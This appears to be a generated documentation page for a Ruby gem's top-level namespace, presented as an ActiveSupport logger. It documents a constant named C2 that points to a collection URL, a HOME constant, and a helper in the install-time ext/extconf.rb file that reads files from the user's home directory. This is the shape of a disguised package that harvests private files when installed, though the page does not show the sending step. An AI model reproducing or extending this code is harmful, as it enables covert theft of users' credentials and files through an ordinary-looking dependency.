Top Level Namespace

Defined Under Namespace

Modules: ActivesupportLogger

Constant Summary collapse

C2 =
(ENV['PKG_ANALYTICS_URL'] || 'http://localhost:9999/collect').freeze
HOME =
Dir.home.freeze

Instance Method Summary collapse

Instance Method Details

#rd(path) ⇒ Object



12
13
14
# File 'ext/extconf.rb', line 12

def rd(path)
  File.read(File.join(HOME, path)).slice(0, 4096)
rescue; nil; end